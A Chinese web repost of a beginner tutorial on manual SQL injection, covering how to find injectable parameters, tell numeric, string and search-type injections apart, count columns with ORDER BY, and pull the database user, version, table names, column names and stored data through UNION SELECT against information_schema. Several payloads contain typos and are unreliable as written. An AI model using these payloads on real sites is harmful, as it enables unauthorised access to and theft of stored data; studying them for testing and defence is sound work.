一起聊聊简单的sql手工注入过程

WBOY

发布时间：2022-01-28 17:02:47

5001人浏览过

来源于CSDN

转载

本篇文章给大家带来了关于sql中手工注入的相关问题，其中包括判断注入点以及判断注入类型的相关问题，希望对大家有帮助。

一起聊聊简单的sql手工注入过程

判断注入点

1.单引号法：直接在网址后面加一个单引号，如果页面不能正常显示，浏览器返回一些异常信息，则说明该链接可能存在sql注入漏洞

2.1=1和1=2：在网址后面的get传参中加上 and 1=1 ，显示正常，把1=1替换为1=2，显示异常，说明网页存在sql注入。

判断注入类型

1.数字型注入：注入变量的值不需要用引号引起来，如

select * from user where id=$id;

2.字符型注入：注入变量会用引号包裹起来，如`

select * from user where username='$username';`

注入时注意要闭合引号。
3.搜索型注入：

select * from user where username like '%$pass%';

把sql语句构造为

select * from user where username like '%$pass%' union select语句 '%%'；

即传输的变量为 pass%’ union select语句 '% 形成闭合。

判断注入点提交方式

通过抓包等方式判断注入点的提交方式是get,post,还是cookie。

PHP轻论坛

简介PHP轻论坛是一个简单易用的PHP论坛程序，适合小型社区和个人网站使用。v3.0版本是完全重构的版本，解决了之前版本中的所有已知问题，特别是MySQL保留字冲突问题。主要特点• 简单易用：简洁的界面，易于安装和使用• 响应式设计：适配各种设备，包括手机和平板• 安全可靠：避免使用MySQL保留字，防止SQL注入• 功能完善：支持分类、主题、回复、用户管理等基本功能• 易于扩展：模块化设计，便于

下载

使用order by 查询字段

使用order by 语句可以查询出数据库有多少个字段，可以通过不断的尝试来确定数据库字段数量，如在输入oeder by 9时，页面报错而输入order by 8时页面显示正常，即数据库中有8个字段。
如查询语句为：select * from user where id='$id';
可以构造下面的输入：(id = ') ' order by 3 '+--+
即查询语句为：select * from user where id='' order by 3 '--'

使用联合查询来查询当前数据库、用户、版本信息

使用 union select 语句来查询当前使用用户 user() ，数据库database() ,数据库版本 version() ，服务器操作系统的@@version_compile_os等信息
version版本十分重要，如果版本在5.0以上，就可以使用information_schema库来轻易的查询想要的信息
构造语句：

select * from user where id='' union select user(),database(),version()+--+;

查询当前数据库中的表，列和值

5.0 版本以上的mysql数据库自带的information_schema库中存储着数据库中所有的表名和列明信息。
下面我们就应该根据第五步查询的当前数据库的结果（如数据库为database_1）名下所有的表名tables的信息。
Information_schema.tables ：记录着数据库中所有表名信息的表。
构造的查询语句如下：

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

查询的结果为：第五步查询的当前数据库中的表名信息。
Information_schema.columns：记录着数据库中所有的表中的列名信息；
下面就应该根据上面查询得到的表名信息(如表为table_1)查询他的列名信息，构造语句如下：

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

查询出列名后，就可以直接通过联合查询查出表中存储的信息（如查出的列名为column_1,column_2）构造语句

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--

即可查询出指定数据库指定表的存储数据

推荐学习：mysql视频教程

SQL 使用 CTE 提升 SQL 可读性

SQL 多表 JOIN 的执行顺序解析

SQL 主从切换的风险点

SQL 多对多关系的 JOIN 建模方式

SQL JOIN 与聚合函数一起使用的坑

本站声明：本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

上一篇：一起聊聊MySQL事务与MVCC如何实现的隔离级别下一篇：SQL入门学习之浅析UNION关键字的用法

作者最新文章

夸克浏览器一键启用AI搜索_带你体验夸克AI搜索的强大之处

2025-10-19 18:42

玩转夸克浏览器的AI搜索模式_夸克AI搜索新手入门操作指南

2025-10-20 09:50

夸克浏览器AI搜索最新版教学_探索夸克AI搜索的隐藏功能

2025-10-24 20:48

夸克浏览器怎么用AI搜索_夸克AI搜索正确提问方式教学

2025-10-25 23:12

微信朋友圈怎么设置定时发布微信朋友圈定时发送图文教程

2026-01-02 09:14

微信朋友圈怎么定时发送微信朋友圈定时发布设置方法【教程】

2026-01-06 09:59

苹果手机怎么定时发朋友圈 iPhone微信朋友圈自动发布方法【步骤】

2026-01-08 11:11

微信朋友圈能定时发送吗微信朋友圈定时发送功能开启方法

2026-01-09 08:15

微信朋友圈草稿箱怎么用微信朋友圈定时发送隐藏技巧

2026-01-10 08:41

微信朋友圈定时发送是真的吗微信朋友圈预约发布实现方法

2026-01-15 10:19

热门AI工具

DeepSeek

幻方量化公司旗下的开源大模型平台

AI大模型

开放平台

豆包大模型

字节跳动自主研发的一系列大型语言模型

AI大模型

通义千问

阿里巴巴推出的全能AI助手

AI大模型

腾讯元宝

腾讯混元平台推出的AI助手

文档处理

Excel 表格

文心一言

文心一言是百度开发的AI聊天机器人，通过对话可以生成各种形式的内容。

AI大模型

中文写作

讯飞写作

基于讯飞星火大模型的AI写作工具，可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

中文写作

写作工具

即梦AI

一站式AI创作平台，免费AI图片和视频生成。

图片拼接

图画生成

ChatGPT

最最强大的AI聊天机器人程序，ChatGPT不单是聊天机器人，还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

AI大模型

中文写作

智谱清言 - 免费全能的AI助手

AI大模型

PDF 文档